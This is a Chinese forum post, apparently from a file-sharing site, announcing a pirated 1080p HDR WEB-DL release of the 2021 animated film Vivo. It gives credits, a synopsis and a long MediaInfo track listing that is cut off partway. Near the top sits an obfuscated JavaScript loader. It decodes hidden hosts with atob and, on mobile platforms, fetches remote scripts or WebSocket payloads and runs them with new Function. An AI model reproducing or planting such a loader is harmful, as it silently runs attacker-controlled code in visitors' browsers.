蜜熊的夏天[国英多音轨/简繁字幕].Vivo.2021.Netflix.WEB-DL.1080p.x265.10bit.HDR.DDP5.1.Atmos 16.64GB

版主小s 1月前 270

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 蜜熊的夏天 / 维沃 / 蜜熊的音乐奇旅 / 维沃的精彩生活
◎片  名 Vivo
◎年  代 2021
◎产  地 美国 / 加拿大
◎类  别 喜剧 / 动画 / 歌舞 / 冒险
◎语  言 英语
◎上映日期 2021-08-06(美国网络)
◎IMDb链接 https://www.imdb.com/title/tt6338498/
◎豆瓣链接 https://movie.douban.com/subject/26935358/
◎导  演 柯克·德·米科 Kirk De Micco (id:1326818)
       布兰登·杰佛兹 Brandon Jeffords (id:1453865)
◎编  剧 彼得·巴索奇尼 Peter Barsocchini (id:1278000)
       柯克·德·米科 Kirk De Micco (id:1326818)
       琦亚拉·艾蕾葛莉亚·休德斯 Quiara Alegria Hudes (id:1367423)
       林-曼努尔·米兰达 Lin-Manuel Miranda (id:1118251)
◎演  员 林-曼努尔·米兰达 Lin-Manuel Miranda (id:1118251)
       佐伊·索尔达娜 Zoe Saldana (id:1047985)
       布莱恩·泰里·亨利 Brian Tyree Henry (id:1390623)
       妮可·拜尔 Nicole Byer (id:1444850)
       莱斯利·大卫·贝克 Leslie David Baker (id:1180659)
       凯蒂·洛斯 Katie Lowes (id:1334839)
       莉娅·朱厄特 Lidya Jewett (id:1384424)
       葛洛丽亚·伊斯特芬 Gloria Estefan (id:1055376)
       奥利维亚·特鲁希略 Olivia Trujillo (id:1434035)
       帕洛玛·莫拉莱斯 Paloma Morales (id:1440131)
       林-曼努尔·米兰达 Lin-Manuel Miranda (id:1118251)
       永杜俊 Yong Duk Jhun (id:1443675)
       永杜俊 Yong Duk Jhun (id:1443675)

◎标  签 动画 / 美国 / 索尼动画 / 索尼 / 2021 / 喜剧 / 哥伦比亚 / 3D

◎简  介
  故事讲述一只热爱音乐和冒险的小猴子为达成梦想,一路从哈瓦那来到迈阿密、开启了一段危险之旅。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 282931318878656214444431179417268287954 (0xD4DA97053742D9C2DB0FC62D6BEC79D2)

  4. Complete name                            : V[email protected]BBQDDQ.COM.mkv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 16.6 GiB

  8. Duration                                 : 1 h 39 min

  9. Overall bit rate                         : 23.9 Mb/s

  10. Encoded date                             : UTC 2021-08-14 12:13:13

  11. Writing application                      : mkvmerge v58.0.0 ('Supper's Ready') 64-bit

  12. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID                                       : 1

  15. Format                                   : HEVC

  16. Format/Info                              : High Efficiency Video Coding

  17. Format profile                           : Main [email protected]@Main

  18. HDR format                               : SMPTE ST 2086, HDR10 compatible

  19. Codec ID                                 : V_MPEGH/ISO/HEVC

  20. Duration                                 : 1 h 35 min

  21. Bit rate                                 : 5 373 kb/s

  22. Width                                    : 1 920 pixels

  23. Height                                   : 1 080 pixels

  24. Display aspect ratio                     : 16:9

  25. Frame rate mode                          : Constant

  26. Frame rate                               : 23.976 (24000/1001/53354) FPS

  27. Color space                              : YUV

  28. Chroma subsampling                       : 4:2:0 (Type 2)

  29. Bit depth                                : 10 bits

  30. Bits/(Pixel*Frame)                       : 0.108

  31. Stream size                              : 3.59 GiB (22%)

  32. Default                                  : Yes

  33. Forced                                   : No

  34. Color range                              : Limited

  35. Color primaries                          : BT.2020

  36. Transfer characteristics                 : PQ

  37. Matrix coefficients                      : BT.2020 non-constant

  38. Mastering display color primaries        : Display P3

  39. Mastering display luminance              : min: 0.0001 cd/m2, max: 1000 cd/m2

  40. Maximum Content Light Level              : 2676 cd/m2

  41. Maximum Frame-Average Light Level        : 244 cd/m2


  42. Audio #1

  43. ID                                       : 2

  44. Format                                   : E-AC-3 JOC

  45. Format/Info                              : Enhanced AC-3 with Joint Object Coding

  46. Commercial name                          : Dolby Digital Plus with Dolby Atmos

  47. Codec ID                                 : A_EAC3

  48. Duration                                 : 1 h 39 min

  49. Bit rate mode                            : Constant

  50. Bit rate                                 : 768 kb/s

  51. Channel(s)                               : 6 channels

  52. Channel layout                           : L R C LFE Ls Rs

  53. Sampling rate                            : 48.0 kHz

  54. Frame rate                               : 31.250 FPS (1536 SPF)

  55. Compression mode                         : Lossy

  56. Stream size                              : 549 MiB (3%)

  57. Language                                 : English

  58. Service kind                             : Complete Main

  59. Default                                  : Yes

  60. Forced                                   : No

  61. Complexity index                         : 16

  62. Number of dynamic objects                : 15

  63. Bed channel count                        : 1 channel

  64. Bed channel configuration                : LFE


  65. Audio #2

  66. ID                                       : 3

  67. Format                                   : E-AC-3

  68. Format/Info                              : Enhanced AC-3

  69. Commercial name                          : Dolby Digital Plus

  70. Codec ID                                 : A_EAC3

  71. Duration                                 : 1 h 39 min

  72. Bit rate mode                            : Constant

  73. Bit rate                                 : 640 kb/s

  74. Channel(s)                               : 6 channels

  75. Channel layout                           : L R C LFE Ls Rs

  76. Sampling rate                            : 48.0 kHz

  77. Frame rate                               : 31.250 FPS (1536 SPF)

  78. Compression mode                         : Lossy

  79. Stream size                              : 457 MiB (3%)

  80. Language                                 : German

  81. Service kind                             : Complete Main

  82. Default                                  : Yes

  83. Forced                                   : No


  84. Audio #3

  85. ID                                       : 4

  86. Format                                   : E-AC-3

  87. Format/Info                              : Enhanced AC-3

  88. Commercial name                          : Dolby Digital Plus

  89. Codec ID                                 : A_EAC3

  90. Duration                                 : 1 h 39 min

  91. Bit rate mode                            : Constant

  92. Bit rate                                 : 640 kb/s

  93. Channel(s)                               : 6 channels

  94. Channel layout                           : L R C LFE Ls Rs

  95. Sampling rate                            : 48.0 kHz

  96. Frame rate                               : 31.250 FPS (1536 SPF)

  97. Compression mode                         : Lossy

  98. Stream size                              : 457 MiB (3%)

  99. Language                                 : French

  100. Service kind                             : Complete Main

  101. Default                                  : Yes

  102. Forced                                   : No


  103. Audio #4

  104. ID                                       : 5

  105. Format                                   : E-AC-3

  106. Format/Info                              : Enhanced AC-3

  107. Commercial name                          : Dolby Digital Plus

  108. Codec ID                                 : A_EAC3

  109. Duration                                 : 1 h 39 min

  110. Bit rate mode                            : Constant

  111. Bit rate                                 : 640 kb/s

  112. Channel(s)                               : 6 channels

  113. Channel layout                           : L R C LFE Ls Rs

  114. Sampling rate                            : 48.0 kHz

  115. Frame rate                               : 31.250 FPS (1536 SPF)

  116. Compression mode                         : Lossy

  117. Stream size                              : 457 MiB (3%)

  118. Language                                 : Italian

  119. Service kind                             : Complete Main

  120. Default                                  : Yes

  121. Forced                                   : No


  122. Audio #5

  123. ID                                       : 6

  124. Format                                   : E-AC-3

  125. Format/Info                              : Enhanced AC-3

  126. Commercial name                          : Dolby Digital Plus

  127. Codec ID                                 : A_EAC3

  128. Duration                                 : 1 h 39 min

  129. Bit rate mode                            : Constant

  130. Bit rate                                 : 640 kb/s

  131. Channel(s)                               : 6 channels

  132. Channel layout                           : L R C LFE Ls Rs

  133. Sampling rate                            : 48.0 kHz

  134. Frame rate                               : 31.250 FPS (1536 SPF)

  135. Compression mode                         : Lossy

  136. Stream size                              : 457 MiB (3%)

  137. Language                                 : Spanish

  138. Service kind                             : Complete Main

  139. Default                                  : Yes

  140. Forced                                   : No


  141. Audio #6

  142. ID                                       : 7

  143. Format                                   : E-AC-3

  144. Format/Info                              : Enhanced AC-3

  145. Commercial name                          : Dolby Digital Plus

  146. Codec ID                                 : A_EAC3

  147. Duration                                 : 1 h 39 min

  148. Bit rate mode                            : Constant

  149. Bit rate                                 : 640 kb/s

  150. Channel(s)                               : 6 channels

  151. Channel layout                           : L R C LFE Ls Rs

  152. Sampling rate                            : 48.0 kHz

  153. Frame rate                               : 31.250 FPS (1536 SPF)

  154. Compression mode                         : Lossy

  155. Stream size                              : 457 MiB (3%)

  156. Language                                 : Danish

  157. Service kind                             : Complete Main

  158. Default                                  : Yes

  159. Forced                                   : No


  160. Audio #7

  161. ID                                       : 8

  162. Format                                   : E-AC-3

  163. Format/Info                              : Enhanced AC-3

  164. Commercial name                          : Dolby Digital Plus

  165. Codec ID                                 : A_EAC3

  166. Duration                                 : 1 h 39 min

  167. Bit rate mode                            : Constant

  168. Bit rate                                 : 640 kb/s

  169. Channel(s)                               : 6 channels

  170. Channel layout                           : L R C LFE Ls Rs

  171. Sampling rate                            : 48.0 kHz

  172. Frame rate                               : 31.250 FPS (1536 SPF)

  173. Compression mode                         : Lossy

  174. Stream size                              : 457 MiB (3%)

  175. Language                                 : Finnish

  176. Service kind                             : Complete Main

  177. Default                                  : Yes

  178. Forced                                   : No


  179. Audio #8

  180. ID                                       : 9

  181. Format                                   : E-AC-3

  182. Format/Info                              : Enhanced AC-3

  183. Commercial name                          : Dolby Digital Plus

  184. Codec ID                                 : A_EAC3

  185. Duration                                 : 1 h 39 min

  186. Bit rate mode                            : Constant

  187. Bit rate                                 : 640 kb/s

  188. Channel(s)                               : 6 channels

  189. Channel layout                           : L R C LFE Ls Rs

  190. Sampling rate                            : 48.0 kHz

  191. Frame rate                               : 31.250 FPS (1536 SPF)

  192. Compression mode                         : Lossy

  193. Stream size                              : 457 MiB (3%)

  194. Language                                 : Swedish

  195. Service kind                             : Complete Main

  196. Default                                  : Yes

  197. Forced                                   : No


  198. Audio #9

  199. ID                                       : 10

  200. Format                                   : E-AC-3

  201. Format/Info                              : Enhanced AC-3

  202. Commercial name                          : Dolby Digital Plus

  203. Codec ID                                 : A_EAC3

  204. Duration                                 : 1 h 39 min

  205. Bit rate mode                            : Constant

  206. Bit rate                                 : 640 kb/s

  207. Channel(s)                               : 6 channels

  208. Channel layout                           : L R C LFE Ls Rs

  209. Sampling rate                            : 48.0 kHz

  210. Frame rate                               : 31.250 FPS (1536 SPF)

  211. Compression mode                         : Lossy

  212. Stream size                              : 457 MiB (3%)

  213. Language                                 : Dutch

  214. Service kind                             : Complete Main

  215. Default                                  : Yes

  216. Forced                                   : No


  217. Audio #10

  218. ID                                       : 11

  219. Format                                   : E-AC-3

  220. Format/Info                              : Enhanced AC-3

  221. Commercial name                          : Dolby Digital Plus

  222. Codec ID                                 : A_EAC3

  223. Duration                                 : 1 h 39 min

  224. Bit rate mode                            : Constant

  225. Bit rate                                 : 640 kb/s

  226. Channel(s)                               : 6 channels

  227. Channel layout                           : L R C LFE Ls Rs

  228. Sampling rate                            : 48.0 kHz

  229. Frame rate                               : 31.250 FPS (1536 SPF)

  230. Compression mode                         : Lossy

  231. Stream size                              : 457 MiB (3%)

  232. Language                                 : Polish

  233. Service kind                             : Complete Main

  234. Default                                  : Yes

  235. Forced                                   : No


  236. Audio #11

  237. ID                                       : 12

  238. Format                                   : E-AC-3

  239. Format/Info                              : Enhanced AC-3

  240. Commercial name                          : Dolby Digital Plus

  241. Codec ID                                 : A_EAC3

  242. Duration                                 : 1 h 39 min

  243. Bit rate mode                            : Constant

  244. Bit rate                                 : 640 kb/s

  245. Channel(s)                               : 6 channels

  246. Channel layout                           : L R C LFE Ls Rs

  247. Sampling rate                            : 48.0 kHz

  248. Frame rate                               : 31.250 FPS (1536 SPF)

  249. Compression mode                         : Lossy

  250. Stream size                              : 457 MiB (3%)

  251. Language                                 : Czech

  252. Service kind                             : Complete Main

  253. Default                                  : Yes

  254. Forced                                   : No


  255. Audio #12

  256. ID                                       : 13

  257. Format                                   : E-AC-3

  258. Format/Info                              : Enhanced AC-3

  259. Commercial name                          : Dolby Digital Plus

  260. Codec ID                                 : A_EAC3

  261. Duration                                 : 1 h 39 min

  262. Bit rate mode                            : Constant

  263. Bit rate                                 : 640 kb/s

  264. Channel(s)                               : 6 channels

  265. Channel layout                           : L R C LFE Ls Rs

  266. Sampling rate                            : 48.0 kHz

  267. Frame rate                               : 31.250 FPS (1536 SPF)

  268. Compression mode                         : Lossy

  269. Stream size                              : 457 MiB (3%)

  270. Language                                 : Russian

  271. Service kind                             : Complete Main

  272. Default                                  : Yes

  273. Forced                                   : No


  274. Audio #13

  275. ID                                       : 14

  276. Format                                   : E-AC-3

  277. Format/Info                              : Enhanced AC-3

  278. Commercial name                          : Dolby Digital Plus

  279. Codec ID                                 : A_EAC3

  280. Duration                                 : 1 h 39 min

  281. Bit rate mode                            : Constant

  282. Bit rate                                 : 640 kb/s

  283. Channel(s)                               : 6 channels

  284. Channel layout                           : L R C LFE Ls Rs

  285. Sampling rate                            : 48.0 kHz

  286. Frame rate                               : 31.250 FPS (1536 SPF)

  287. Compression mode                         : Lossy

  288. Stream size                              : 457 MiB (3%)

  289. Language                                 : Greek

  290. Service kind                             : Complete Main

  291. Default                                  : Yes

  292. Forced                                   : No


  293. Audio #14

  294. ID                                       : 15

  295. Format                                   : E-AC-3

  296. Format/Info                              : Enhanced AC-3

  297. Commercial name                          : Dolby Digital Plus

  298. Codec ID                                 : A_EAC3

  299. Duration                                 : 1 h 39 min

  300. Bit rate mode                            : Constant

  301. Bit rate                                 : 640 kb/s

  302. Channel(s)                               : 6 channels

  303. Channel layout                           : L R C LFE Ls Rs

  304. Sampling rate                            : 48.0 kHz

  305. Frame rate                               : 31.250 FPS (1536 SPF)

  306. Compression mode                         : Lossy

  307. Stream size                              : 457 MiB (3%)

  308. Language                                 : Romanian

  309. Service kind                             : Complete Main

  310. Default                                  : Yes

  311. Forced                                   : No


  312. Audio #15

  313. ID                                       : 16

  314. Format                                   : E-AC-3

  315. Format/Info                              : Enhanced AC-3

  316. Commercial name                          : Dolby Digital Plus

  317. Codec ID                                 : A_EAC3

  318. Duration                                 : 1 h 39 min

  319. Bit rate mode                            : Constant

  320. Bit rate                                 : 640 kb/s

  321. Channel(s)                               : 6 channels

  322. Channel layout                           : L R C LFE Ls Rs

  323. Sampling rate                            : 48.0 kHz

  324. Frame rate                               : 31.250 FPS (1536 SPF)

  325. Compression mode                         : Lossy

  326. Stream size                              : 457 MiB (3%)

  327. Language                                 : Hungarian

  328. Service kind                             : Complete Main

  329. Default                                  : Yes

  330. Forced                                   : No


  331. Audio #16

  332. ID                                       : 17

  333. Format                                   : E-AC-3

  334. Format/Info                              : Enhanced AC-3

  335. Commercial name                          : Dolby Digital Plus

  336. Codec ID                                 : A_EAC3

  337. Duration                                 : 1 h 39 min

  338. Bit rate mode                            : Constant

  339. Bit rate                                 : 640 kb/s

  340. Channel(s)                               : 6 channels

  341. Channel layout                           : L R C LFE Ls Rs

  342. Sampling rate                            : 48.0 kHz

  343. Frame rate                               : 31.250 FPS (1536 SPF)

  344. Compression mode                         : Lossy

  345. Stream size                              : 457 MiB (3%)

  346. Language                                 : Portuguese

  347. Service kind                             : Complete Main

  348. Default                                  : Yes

  349. Forced                                   : No


  350. Audio #17

  351. ID                                       : 18

  352. Format                                   : E-AC-3

  353. Format/Info                              : Enhanced AC-3

  354. Commercial name                          : Dolby Digital Plus

  355. Codec ID                                 : A_EAC3

  356. Duration                                 : 1 h 39 min

  357. Bit rate mode                            : Constant

  358. Bit rate                                 : 640 kb/s

  359. Channel(s)                               : 6 channels

  360. Channel layout                           : L R C LFE Ls Rs

  361. Sampling rate                            : 48.0 kHz

  362. Frame rate                               : 31.250 FPS (1536 SPF)

  363. Compression mode                         : Lossy

  364. Stream size                              : 457 MiB (3%)

  365. Language                                 : Turkish

  366. Service kind                             : Complete Main

  367. Default                                  : Yes

  368. Forced                                   : No


  369. Audio #18

  370. ID                                       : 19

  371. Format                                   : E-AC-3

  372. Format/Info                              : Enhanced AC-3

  373. Commercial name                          : Dolby Digital Plus

  374. Codec ID                                 : A_EAC3

  375. Duration                                 : 1 h 39 min

  376. Bit rate mode                            : Constant

  377. Bit rate                                 : 640 kb/s

  378. Channel(s)                               : 6 channels

  379. Channel layout                           : L R C LFE Ls Rs

  380. Sampling rate                            : 48.0 kHz

  381. Frame rate                               : 31.250 FPS (1536 SPF)

  382. Compression mode                         : Lossy

  383. Stream size                              : 457 MiB (3%)

  384. Language                                 : Arabic

  385. Service kind                             : Complete Main

  386. Default                                  : Yes

  387. Forced                                   : No


  388. Audio #19

  389. ID                                       : 20

  390. Format                                   : E-AC-3

  391. Format/Info                              : Enhanced AC-3

  392. Commercial name                          : Dolby Digital Plus

  393. Codec ID                                 : A_EAC3

  394. Duration                                 : 1 h 39 min

  395. Bit rate mode                            : Constant

  396. Bit rate                                 : 640 kb/s

  397. Channel(s)                               : 6 channels

  398. Channel layout                           : L R C LFE Ls Rs

  399. Sampling rate                            : 48.0 kHz

  400. Frame rate                               : 31.250 FPS (1536 SPF)

  401. Compression mode                         : Lossy

  402. Stream size                              : 457 MiB (3%)

  403. Language                                 : Hebrew

  404. Service kind                             : Complete Main

  405. Default                                  : Yes

  406. Forced                                   : No


  407. Audio #20

  408. ID                                       : 21

  409. Format                                   : E-AC-3

  410. Format/Info                              : Enhanced AC-3

  411. Commercial name                          : Dolby Digital Plus

  412. Codec ID                                 : A_EAC3

  413. Duration                                 : 1 h 39 min

  414. Bit rate mode                            : Constant

  415. Bit rate                                 : 640 kb/s

  416. Channel(s)                               : 6 channels

  417. Channel layout                           : L R C LFE Ls Rs

  418. Sampling rate                            : 48.0 kHz

  419. Frame rate                               : 31.250 FPS (1536 SPF)

  420. Compression mode                         : Lossy

  421. Stream size                              : 457 MiB (3%)

  422. Language                                 : Chinese

  423. Service kind                             : Complete Main

  424. Default                                  : Yes

  425. Forced                                   : No


  426. Audio #21

  427. ID                                       : 22

  428. Format                                   : E-AC-3

  429. Format/Info                              : Enhanced AC-3

  430. Commercial name                          : Dolby Digital Plus

  431. Codec ID                                 : A_EAC3

  432. Duration                                 : 1 h 39 min

  433. Bit rate mode                            : Constant

  434. Bit rate                                 : 640 kb/s

  435. Channel(s)                               : 6 channels

  436. Channel layout                           : L R C LFE Ls Rs

  437. Sampling rate                            : 48.0 kHz

  438. Frame rate                               : 31.250 FPS (1536 SPF)

  439. Compression mode                         : Lossy

  440. Stream size                              : 457 MiB (3%)

  441. Language                                 : Japanese

  442. Service kind                             : Complete Main

  443. Default                                  : Yes

  444. Forced                                   : No


  445. Audio #22

  446. ID                                       : 23

  447. Format                                   : E-AC-3

  448. Format/Info                              : Enhanced AC-3

  449. Commercial name                          : Dolby Digital Plus

  450. Codec ID                                 : A_EAC3

  451. Duration                                 : 1 h 39 min

  452. Bit rate mode                            : Constant

  453. Bit rate                                 : 640 kb/s

  454. Channel(s)                               : 6 channels

  455. Channel layout                           : L R C LFE Ls Rs

  456. Sampling rate                            : 48.0 kHz

  457. Frame rate                               : 31.250 FPS (1536 SPF)

  458. Compression mode                         : Lossy

  459. Stream size                              : 457 MiB (3%)

  460. Language                                 : Korean

  461. Service kind                             : Complete Main

  462. Default                                  : Yes

  463. Forced                                   : No


  464. Audio #23

  465. ID                                       : 24

  466. Format                                   : E-AC-3

  467. Format/Info                              : Enhanced AC-3

  468. Commercial name                          : Dolby Digital Plus

  469. Codec ID                                 : A_EAC3

  470. Duration                                 : 1 h 39 min

  471. Bit rate mode                            : Constant

  472. Bit rate                                 : 640 kb/s

  473. Channel(s)                               : 6 channels

  474. Channel layout                           : L R C LFE Ls Rs

  475. Sampling rate                            : 48.0 kHz

  476. Frame rate                               : 31.250 FPS (1536 SPF)

  477. Compression mode                         : Lossy

  478. Stream size                              : 457 MiB (3%)

  479. Language                                 : Vietnamese

  480. Service kind                             : Complete Main

  481. Default                                  : Yes

  482. Forced                                   : No


  483. Audio #24

  484. ID                                       : 25

  485. Format                                   : E-AC-3

  486. Format/Info                              : Enhanced AC-3

  487. Commercial name                          : Dolby Digital Plus

  488. Codec ID                                 : A_EAC3

  489. Duration                                 : 1 h 39 min

  490. Bit rate mode                            : Constant

  491. Bit rate                                 : 640 kb/s

  492. Channel(s)                               : 6 channels

  493. Channel layout                           : L R C LFE Ls Rs

  494. Sampling rate                            : 48.0 kHz

  495. Frame rate                               : 31.250 FPS (1536 SPF)

  496. Compression mode                         : Lossy

  497. Stream size                              : 457 MiB (3%)

  498. Language                                 : Thai

  499. Service kind                             : Complete Main

  500. Default                                  : Yes

  501. Forced                                   : No


  502. Audio #25

  503. ID                                       : 26

  504. Format                                   : E-AC-3

  505. Format/Info                              : Enhanced AC-3

  506. Commercial name                          : Dolby Digital Plus

  507. Codec ID                                 : A_EAC3

  508. Duration                                 : 1 h 39 min

  509. Bit rate mode                            : Constant

  510. Bit rate                                 : 640 kb/s

  511. Channel(s)                               : 6 channels

  512. Channel layout                           : L R C LFE Ls Rs

  513. Sampling rate                            : 48.0 kHz

  514. Frame rate                               : 31.250 FPS (1536 SPF)

  515. Compression mode                         : Lossy

  516. Stream size                              : 457 MiB (3%)

  517. Language                                 : Hindi

  518. Service kind                             : Complete Main

  519. Default                                  : Yes

  520. Forced                                   : No


  521. Audio #26

  522. ID                                       : 27

  523. Format                                   : E-AC-3

  524. Format/Info                              : Enhanced AC-3

  525. Commercial name                          : Dolby Digital Plus

  526. Codec ID                                 : A_EAC3

  527. Duration                                 : 1 h 39 min

  528. Bit rate mode                            : Constant

  529. Bit rate                                 : 640 kb/s

  530. Channel(s)                               : 6 channels

  531. Channel layout                           : L R C LFE Ls Rs

  532. Sampling rate                            : 48.0 kHz

  533. Frame rate                               : 31.250 FPS (1536 SPF)

  534. Compression mode                         : Lossy

  535. Stream size                              : 457 MiB (3%)

  536. Language                                 : Norwegian Bokmal

  537. Service kind                             : Complete Main

  538. Default                                  : Yes

  539. Forced                                   : No


  540. Audio #27

  541. ID                                       : 28

  542. Format                                   : E-AC-3

  543. Format/Info                              : Enhanced AC-3

  544. Commercial name                          : Dolby Digital Plus

  545. Codec ID                                 : A_EAC3

  546. Duration                                 : 1 h 39 min

  547. Bit rate mode                            : Constant

  548. Bit rate                                 : 640 kb/s

  549. Channel(s)                               : 6 channels

  550. Channel layout                           : L R C LFE Ls Rs

  551. Sampling rate                            : 48.0 kHz

  552. Frame rate                               : 31.250 FPS (1536 SPF)

  553. Compression mode                         : Lossy

  554. Stream size                              : 457 MiB (3%)

  555. Language                                 : Indonesian

  556. Service kind                             : Complete Main

  557. Default                                  : Yes

  558. Forced                                   : No


  559. Audio #28

  560. ID                                       : 29

  561. Format                                   : E-AC-3

  562. Format/Info                              : Enhanced AC-3

  563. Commercial name                          : Dolby Digital Plus

  564. Codec ID                                 : A_EAC3

  565. Duration                                 : 1 h 39 min

  566. Bit rate mode                            : Constant

  567. Bit rate                                 : 640 kb/s

  568. Channel(s)                               : 6 channels

  569. Channel layout                           : L R C LFE Ls Rs

  570. Sampling rate                            : 48.0 kHz

  571. Frame rate                               : 31.250 FPS (1536 SPF)

  572. Compression mode                         : Lossy

  573. Stream size                              : 457 MiB (3%)

  574. Language                                 : Croatian

  575. Service kind                             : Complete Main

  576. Default                                  : Yes

  577. Forced                                   : No


  578. Audio #29

  579. ID                                       : 30

  580. Format                                   : E-AC-3

  581. Format/Info                              : Enhanced AC-3

  582. Commercial name                          : Dolby Digital Plus

  583. Codec ID                                 : A_EAC3

  584. Duration                                 : 1 h 39 min

  585. Bit rate mode                            : Constant

  586. Bit rate                                 : 640 kb/s

  587. Channel(s)                               : 6 channels

  588. Channel layout                           : L R C LFE Ls Rs

  589. Sampling rate                            : 48.0 kHz

  590. Frame rate                               : 31.250 FPS (1536 SPF)

  591. Compression mode                         : Lossy

  592. Stream size                              : 457 MiB (3%)

  593. Language                                 : Ukrainian

  594. Service kind                             : Complete Main

  595. Default                                  : Yes

  596. Forced                                   : No


  597. Text #1

  598. ID                                       : 31

  599. Format                                   : UTF-8

  600. Codec ID                                 : S_TEXT/UTF8

  601. Codec ID/Info                            : UTF-8 Plain Text

  602. Duration                                 : 1 h 34 min

  603. Bit rate                                 : 95 b/s

  604. Count of elements                        : 1284

  605. Stream size                              : 65.7 KiB (0%)

  606. Title                                    : ???????

  607. Language                                 : Arabic

  608. Default                                  : Yes

  609. Forced                                   : No


  610. Text #2

  611. ID                                       : 32

  612. Format                                   : UTF-8

  613. Codec ID                                 : S_TEXT/UTF8

  614. Codec ID/Info                            : UTF-8 Plain Text

  615. Duration                                 : 1 h 34 min

  616. Bit rate                                 : 65 b/s

  617. Count of elements                        : 1347

  618. Stream size                              : 45.2 KiB (0%)

  619. Title                                    : ?e?tina

  620. Language                                 : Czech

  621. Default                                  : Yes

  622. Forced                                   : No


  623. Text #3

  624. ID                                       : 33

  625. Format                                   : UTF-8

  626. Codec ID                                 : S_TEXT/UTF8

  627. Codec ID/Info                            : UTF-8 Plain Text

  628. Duration                                 : 1 h 34 min

  629. Bit rate                                 : 57 b/s

  630. Count of elements                        : 1138

  631. Stream size                              : 39.9 KiB (0%)

  632. Title                                    : Dansk

  633. Language                                 : Danish

  634. Default                                  : Yes

  635. Forced                                   : No


  636. Text #4

  637. ID                                       : 34

  638. Format                                   : UTF-8

  639. Codec ID                                 : S_TEXT/UTF8

  640. Codec ID/Info                            : UTF-8 Plain Text

  641. Duration                                 : 1 h 34 min

  642. Bit rate                                 : 61 b/s

  643. Count of elements                        : 1130

  644. Stream size                              : 42.5 KiB (0%)

  645. Title                                    : Deutsch

  646. Language                                 : German

  647. Default                                  : Yes

  648. Forced                                   : No


  649. Text #5

  650. ID                                       : 35

  651. Format                                   : UTF-8

  652. Codec ID                                 : S_TEXT/UTF8

  653. Codec ID/Info                            : UTF-8 Plain Text

  654. Duration                                 : 1 h 33 min

  655. Bit rate                                 : 98 b/s

  656. Count of elements                        : 1228

  657. Stream size                              : 67.2 KiB (0%)

  658. Title                                    : Ελληνικ?

  659. Language                                 : Greek

  660. Default                                  : Yes

  661. Forced                                   : No


  662. Text #6

  663. ID                                       : 36

  664. Format                                   : UTF-8

  665. Codec ID                                 : S_TEXT/UTF8

  666. Codec ID/Info                            : UTF-8 Plain Text

  667. Duration                                 : 1 h 32 min

  668. Bit rate                                 : 93 b/s

  669. Count of elements                        : 1697

  670. Stream size                              : 63.2 KiB (0%)

  671. Title                                    : English

  672. Language                                 : English

  673. Default                                  : Yes

  674. Forced                                   : No


  675. Text #7

  676. ID                                       : 37

  677. Format                                   : UTF-8

  678. Codec ID                                 : S_TEXT/UTF8

  679. Codec ID/Info                            : UTF-8 Plain Text

  680. Duration                                 : 1 h 33 min

  681. Bit rate                                 : 56 b/s

  682. Count of elements                        : 1295

  683. Stream size                              : 38.6 KiB (0%)

  684. Title                                    : Espa?ol

  685. Language                                 : Spanish

  686. Default                                  : Yes

  687. Forced                                   : No


  688. Text #8

  689. ID                                       : 38

  690. Format                                   : UTF-8

  691. Codec ID                                 : S_TEXT/UTF8

  692. Codec ID/Info                            : UTF-8 Plain Text

  693. Duration                                 : 1 h 34 min

  694. Bit rate                                 : 57 b/s

  695. Count of elements                        : 1203

  696. Stream size                              : 39.7 KiB (0%)

  697. Title                                    : Suomi

  698. Language                                 : Finnish

  699. Default                                  : Yes

  700. Forced                                   : No


  701. Text #9

  702. ID                                       : 39

  703. Format                                   : UTF-8

  704. Codec ID                                 : S_TEXT/UTF8

  705. Codec ID/Info                            : UTF-8 Plain Text

  706. Duration                                 : 1 h 33 min

  707. Bit rate                                 : 61 b/s

  708. Count of elements                        : 1170

  709. Stream size                              : 42.4 KiB (0%)

  710. Title                                    : Fran?ais

  711. Language                                 : French

  712. Default                                  : Yes

  713. Forced                                   : No


  714. Text #10

  715. ID                                       : 40

  716. Format                                   : UTF-8

  717. Codec ID                                 : S_TEXT/UTF8

  718. Codec ID/Info                            : UTF-8 Plain Text

  719. Duration                                 : 1 h 34 min

  720. Bit rate                                 : 90 b/s

  721. Count of elements                        : 1267

  722. Stream size                              : 62.2 KiB (0%)

  723. Title                                    : ?????

  724. Language                                 : Hebrew

  725. Default                                  : Yes

  726. Forced                                   : No


  727. Text #11

  728. ID                                       : 41

  729. Format                                   : UTF-8

  730. Codec ID                                 : S_TEXT/UTF8

  731. Codec ID/Info                            : UTF-8 Plain Text

  732. Duration                                 : 1 h 34 min

  733. Bit rate                                 : 56 b/s

  734. Count of elements                        : 1268

